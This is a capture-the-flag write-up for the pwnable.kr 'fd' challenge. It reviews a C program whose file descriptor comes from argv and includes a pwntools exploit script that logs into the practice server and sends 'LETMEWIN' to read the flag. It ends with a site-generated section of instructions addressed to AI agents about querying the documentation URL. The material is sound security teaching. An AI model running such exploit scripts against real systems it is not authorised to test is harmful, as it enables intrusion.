# fd ## Challenge Mommy! what is a file descriptor in Linux? * try to play the wargame your self but if you are ABSOLUTE beginner, follow this tutorial link: ssh -p2222 (pw:guest) ## Code Review ```c #include #include #include char buf[32]; int main(int argc, char* argv[], char* envp[]){ if(argc<2){ printf("pass argv[1] a number\n"); return 0; } int fd = atoi( argv[1] ) - 0x1234; int len = 0; len = read(fd, buf, 32); if(!strcmp("LETMEWIN\n", buf)){ printf("good job :)\n"); system("/bin/cat flag"); exit(0); } printf("learn about Linux file IO\n"); return 0; } ``` Take a look at this portion of the code: ```c int fd = atoi( argv[1] ) - 0x1234; int len = 0; len = read(fd, buf, 32); ``` From man7.org: ![read() syscall](/files/tNvgxylE6csa4p68Rrpj) ## Solution In Linux, the default **file descriptors** are: * **stdin** (standard input) => 0 * **stdout** (standard output) => 1 * **stderr** (standard error) => 2 We are able to control the value of `fd`. The desirable value is `fd = 0` since it will open a stdin session. We can send information through stdin and that information will be stored in `buf`. The idea is clear: 1. Set `argv[1] = 0x1234` so that `fd = 0`. 2. Send "LETMEWIN" through stdin. ## Exploit ```python #!/usr/bin/env python3 # -*- coding: utf-8 -*- # This exploit template was generated via: # $ pwn template --host pwnable.kr --port 2222 --user fd --password guest --path /home/fd/fd from pwn import * # Set up pwntools for the correct architecture exe = context.binary = ELF('fd') # Many built-in settings can be controlled on the command-line and show up # in "args". For example, to dump all data sent/received, and disable ASLR # for all created processes... # ./exploit.py DEBUG NOASLR # ./exploit.py GDB HOST=example.com PORT=4141 host = args.HOST or 'pwnable.kr' port = int(args.PORT or 2222) user = args.USER or 'fd' password = args.PASSWORD or 'guest' remote_path = '/home/fd/fd' # Connect to the remote SSH server shell = None if not args.LOCAL: shell = ssh(user, host, port, password) shell.set_working_directory(symlink=True) def start_local(argv=[], *a, **kw): '''Execute the target binary locally''' if args.GDB: return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw) else: return process([exe.path] + argv, *a, **kw) def start_remote(argv=[], *a, **kw): '''Execute the target binary on the remote host''' if args.GDB: return gdb.debug([remote_path] + argv, gdbscript=gdbscript, ssh=shell, *a, **kw) else: return shell.process([remote_path] + argv, *a, **kw) def start(argv=[], *a, **kw): '''Start the exploit against the target.''' if args.LOCAL: return start_local(argv, *a, **kw) else: return start_remote(argv, *a, **kw) # Specify your GDB script here for debugging # GDB will be launched if the exploit is run via e.g. # ./exploit.py GDB gdbscript = ''' tbreak main continue '''.format(**locals()) #=========================================================== # EXPLOIT GOES HERE #=========================================================== # Arch: i386-32-little # RELRO: Partial RELRO # Stack: No canary found # NX: NX enabled # PIE: No PIE (0x8048000) argv = [str(0x1234)] io = start(argv) io.sendline(b'LETMEWIN') success(io.readall().decode()) ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ret2basic.gitbook.io/ctfwriteup/web2-ctf/pwnable.kr/fd.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.